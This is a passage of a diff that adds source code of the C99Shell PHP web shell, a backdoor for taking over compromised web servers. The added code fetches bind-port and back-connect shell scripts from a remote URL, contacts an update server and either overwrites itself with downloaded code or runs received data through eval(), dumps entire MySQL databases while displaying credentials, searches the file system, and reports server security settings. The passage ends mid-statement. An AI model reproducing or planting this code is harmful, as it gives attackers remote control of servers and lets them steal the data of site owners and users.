+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; 
$w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+ "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+ "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+ "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+ "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+ "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+ "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return false;}
+}
+}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate($update = true)
+{
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+ $data = ltrim($data);
+ $string = substr($data,3,ord($data{2}));
+ if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
+ if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+ if ($data{0} == "\x99" and $data{1} == "\x03")
+ {
+ $string = explode("\x01",$string);
+ if ($update)
+ {
+ $confvars = array();
+ $sourceurl = $string[0];
+ $source = file_get_contents($sourceurl);
+ if (!$source) {return 
"Can't fetch update!";}
+ else
+ {
+ $fp = fopen(__FILE__,"w");
+ if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+ else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+ }
+ }
+ else {return "New version are available: ".$string[1];}
+ }
+ elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+ else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+ $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+ // retrive tables-list
+ $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+ if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+ if ((in_array($tab,$onlytabs)) or (!$c))
+ {
+ if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+ // recieve query for create table structure
+ $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+ if (!$res) {$ret["err"][] = mysql_smarterror();}
+ else
+ {
+ $row = mysql_fetch_row($res);
+ $out .= $row["1"].";\n\n";
+ // recieve table variables
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+ while ($row = mysql_fetch_assoc($res))
+ {
+ $keys = implode("`, `", array_keys($row));
+ $values = array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = implode("', '", $values);
+ $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+ $out .= $sql;
+ }
+ }
+ }
+ }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+ $fp = fopen($file, "w");
+ if (!$fp) {$ret["err"][] = 2;}
+ else
+ {
+ fwrite ($fp, $out);
+ fclose ($fp);
+ }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+ $value = "";
+ if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+ $value .= "'".addslashes($v)."'";
+ if (!empty($functs[$k])) {$value .= ")";}
+ $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+
mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+ echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+ if ($tbl_struct)
+ {
+ echo "<td valign=\"top\"><b>Fields:</b><br>";
+ foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "آ» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+ echo "</td></tr></table>";
+ }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if 
(!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+ "METHOD"=>array(output_type),
+ "METHOD1"...
+ ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+ "SELECT"=>array(3,1),
+ "SHOW"=>array(2,1),
+ "DELETE"=>array(1),
+ "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+ $result["propertions"] = $types[$op];
+ $result["query"] = $query;
+ if ($types[$op] == 2)
+ {
+ foreach($arr as $k=>$v)
+ {
+ if (strtoupper($v) == "LIMIT")
+ {
+ $result["limit"] = $arr[$k+1];
+ $result["limit"] = explode(",",$result["limit"]);
+ if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+ unset($arr[$k],$arr[$k+1]);
+ }
+ }
+ }
+ }
+ else {return false;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== false)
+ {
+ if($f != "." && $f != "..")
+ {
+ $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
+ if (is_dir($d.$f))
+ {
+ $search_i_d++;
+ if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+ if (!is_link($d.$f)) {c99fsearch($d.$f);}
+ }
+ else
+ {
+ $search_i_f++;
+ if ($bool)
+ {
+ if (!empty($a["text"]))
+ {
+ $r = @file_get_contents($d.$f);
+ if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." 
";}
+ if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+ if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+ else {$bool = strpos(" ".$r,$a["text"],1);}
+ if ($a["text_not"]) {$bool = !$bool;}
+ if ($bool) {$found[] = $d.$f; $found_f++;}
+ }
+ else {$found[] = $d.$f; $found_f++;}
+ }
+ }
+ }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+ $v = @ob_get_contents();
+ @ob_end_clean();
+ @ob_start("ob_gzHandler");
+ echo $v;
+ @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if 
(empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; 
background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. 
<?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+ $t.= $r.DIRECTORY_SEPARATOR;
+ if ($j == $i) {break;}
+ $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === false) {$free = 0;}
+ if ($total === false) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." 
(".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+ $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+ if (!$bool) {$bool = is_dir($letter.":\\");}
+ if ($bool)
+ {
+ $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+ if ($letter.":" != $v) {$letters .= $letter;}
+ else {$letters .= "<font color=green>".$letter."</font>";}
+ $letters .= " ]</a> ";
+ }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+ $item[1] = str_replace("%d",urlencode($d),$item[1]);
+ $item[1] = str_replace("%sort",$sort,$item[1]);
+ $v = realpath($d."..");
+ if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+ $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+ echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) 
{$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+ $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+ $err = mysql_smarterror();
+ @mysql_select_db($sql_db,$sql_sock);
+ if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+ if (!$sql_server) {echo "NO CONNECTION";}
+ else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+ $sqlquicklaunch = array();
+ $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+ $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+ $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+ $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+ $sqlquicklaunch[] = 
array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+ $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+ if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+ echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+ //Start left panel
+ if (!empty($sql_db))
+ {
+ ?><td width="25%" height="100%" 
valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>آ»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left 
panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." 
